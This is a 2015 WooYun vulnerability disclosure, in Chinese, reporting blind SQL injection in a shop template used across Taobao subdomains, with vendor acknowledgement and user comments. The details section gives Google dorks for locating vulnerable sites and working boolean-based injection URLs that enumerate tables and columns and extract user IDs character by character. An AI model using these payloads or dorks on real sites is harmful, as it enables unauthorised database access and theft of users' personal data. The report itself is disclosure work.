当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-094216

漏洞标题:淘宝一系列网站存在多处SQL注入(存在通用性影响数万店铺)

相关厂商:淘宝网

漏洞作者: he1renyagao

提交时间:2015-01-27 17:14

修复时间:2015-03-13 17:16

公开时间:2015-03-13 17:16

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-01-27: 细节已通知厂商并且等待厂商处理中
2015-01-28: 厂商已经确认,细节仅向厂商公开
2015-02-07: 细节向核心白帽子及相关领域专家公开
2015-02-17: 细节向普通白帽子公开
2015-02-27: 细节向实习白帽子公开
2015-03-13: 细节向公众公开

简要描述:

淘宝某三级域名下的站点使用同一套网站模板,该模板存在SQL注入漏洞,可盲注。
PS: 感谢浩天提供帮助

详细说明:

GOOGLE 关键字:
site:taobao.com inurl:/c/list_goods.php?category_id=
site:taobao.com inurl:/theme/tejia/view/view_article.php?id=
site:taobao.com inurl:/theme/daogou/view/list_goods.php?category_id
都是存在注入点的
使用这套代码的使用量是很大的

tttt111.png


过程:
根据上次发现的注入点,认为如果存在注入不应该只有一个注入点才对 ,于是有了。。
http://%domain%/theme/tejia/view/view_article.php?id=(SELECT+(CASE+WHEN+(3373=3373)+THEN+(21+and+1=1)+ELSE+1/(SELECT+0)+END)) 访问此连接返回的是200 即页面正常显示 (21+and+1=1)

tt13.png


http://%domain%/theme/tejia/view/view_article.php?id=(SELECT+(CASE+WHEN+(3373=3373)+THEN+(21+and+1=2)+ELSE+1/(SELECT+0)+END)) 访问此连接返回的是
302 即页面跳转到错误页面 (21+and+1=2)

tt14.png


至此确定存在了SQL 注入 ,接下来就是看能不能注入出数据了 ,测试过程众发现似乎有过滤了一些东西,不能使用database()、user() 之类的。 于是想到了使用盲注来猜解。
http://%domain%/theme/tejia/view/view_article.php?id=(SELECT+(CASE+WHEN+(3373=3373)+THEN+(21+and+exists(select+*+from+$$))+ELSE+1/(SELECT+0)+END))
$$ 位置使用burp 加载table来跑 可以得到一些数据表名 user 、item 、 items 、category

t5.png


而列名,使用同样的方法
http://%domain%/theme/tejia/view/view_article.php?id=(SELECT+(CASE+WHEN+(3373=3373)+THEN+(21+and+exists(select+$$+from+user))+ELSE+1/(SELECT+0)+END))
可以得到user表的列名 id name description title category_id uid keyword address zip nick phone name 等列名

t7.png


却定来表名和列名,接下来就是数据来
通过 http://%domain%/theme/tejia/view/view_article.php?id=(SELECT+(CASE+WHEN+(3373=3373)+THEN+(21+and+ascii(substring(select+uid+from+user+limit+1,1),1,1)=48)+ELSE+1/(SELECT+0)+END)) 来判断第一个用户的uid的第一个数字

tt19.png


以此我们可以完整的 得出uid

tt18.png


其他列名数据类似方法。

漏洞证明:

使用的方法和上一个注入一样。

修复方案:

过滤、可能还存在其他地方类似的注入,请自查, 都是site:*.uz.taobao.com 下的域名

版权声明:转载请注明来源 he1renyagao@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:5

确认时间:2015-01-28 12:56

厂商回复:

亲,感谢您的关注和支持,该漏洞我们正在修复!

最新状态:

暂无


漏洞评价:

评论

  1. 2015-01-28 13:00 | 浩天 认证白帽子 ( 普通白帽子 | Rank:915 漏洞数:79 | 度假中...)

    @@

  2. 2015-01-28 13:17 | Naih ( 路人 | Rank:10 漏洞数:1 | 无趣之人)

    @@

  3. 2015-01-28 13:20 | jdnehc ( 实习白帽子 | Rank:76 漏洞数:12 )

    @@

  4. 2015-01-28 13:22 | Jumbo ( 普通白帽子 | Rank:111 漏洞数:29 | 猫 - http://www.chinabaiker.com)

    @@

  5. 2015-01-28 13:30 | p4ssw0rd ( 普通白帽子 | Rank:306 漏洞数:92 | 不作死就不会死)

    @@

  6. 2015-01-28 14:02 | zhxs ( 实习白帽子 | Rank:32 漏洞数:19 | Jyhack-TeaM:http://bbs.jyhack.com/)

    你这么叼 马云知道吗

  7. 2015-01-28 14:16 | zzR 认证白帽子 ( 核心白帽子 | Rank:1382 漏洞数:122 | 收wb 1:5 无限量收 [平台担保])

    浩天,你都对洞主做了什么!

  8. 2015-01-28 14:16 | onpu ( 实习白帽子 | Rank:64 漏洞数:19 | 静坐常思己过,闲谈莫论人非)

    厉害。

  9. 2015-01-28 14:32 | 秋风 ( 普通白帽子 | Rank:438 漏洞数:44 | 码农一枚,关注互联网安全)

    NB!

  10. 2015-01-28 16:08 | ÿÿ ( 路人 | Rank:6 漏洞数:4 | )

    @浩天 你都对洞主做了什么!

  11. 2015-01-28 16:42 | px1624 ( 普通白帽子 | Rank:1036 漏洞数:175 | px1624)

    才5分、、

  12. 2015-01-28 17:01 | 白泽 ( 普通白帽子 | Rank:114 漏洞数:9 | @伏宸安全 树叶的一生只是为了归根)

    应该是uz吧

  13. 2015-03-13 18:23 | 晏子 ( 路人 | Rank:6 漏洞数:4 | 无)

    洞主给这家店打了一个好广告

  14. 2015-03-13 18:48 | 龙帝 ( 实习白帽子 | Rank:39 漏洞数:12 )

    - -求上面谷歌地址。